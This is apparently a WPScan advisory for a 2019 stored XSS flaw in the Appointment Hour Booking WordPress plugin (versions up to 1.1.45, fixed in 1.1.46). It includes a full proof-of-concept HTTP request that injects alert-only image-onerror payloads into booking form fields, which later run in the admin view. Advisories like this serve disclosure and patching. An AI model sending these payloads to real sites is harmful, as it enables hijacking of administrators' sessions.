Appointment Hour Booking <= 1.1.45 - Stored Cross-Site Scripting (XSS)



Description
It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.
Proof of Concept
POST /booking-form/ HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local/booking-form/
Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283
Content-Length: 1809
Connection: close
Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676
Upgrade-Insecure-Requests: 1

-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_pform_psequence"

_1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_pform_process"

1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_id"

2
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_ref_page"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="form_structure_1"


-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="refpage_1"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1"

2019-07-13 12:00/13:00 0 1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_services"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_capacity"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="tcostfieldname1_1"

1.00
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="email_1"

"><img src=x onerror=alert(1)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname2_1"

"><img src=x onerror=alert(2)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"

auvoe
-----------------------------11713224624340267851833710283--

Affects Plugin

fixed in version 1.1.46

References

CVE 2019-13505
URL https://github.com/ivoschyk-cs/CVE-s/blob/master/Appointment%20Hour%20Booking%20%E2%80%93%20WordPress%20Booking%20Plugin%20--%20stored%20XSS
URL https://plugins.trac.wordpress.org/changeset/2121664/appointment-hour-booking
URL https://plugins.trac.wordpress.org/changeset/2122311/appointment-hour-booking

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher ivoschyk-cs
Submitter Ryan Dewhurst
Submitter Website https://wpscan.io
Submitter Twitter ethicalhack3r
Views 2574
Verified Yes
WPVDB ID 9458

Timeline

Publicly Published 2019-07-09 (about 1 month ago)
Added 2019-07-16 (about 1 month ago)
Last Updated 2019-07-16 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin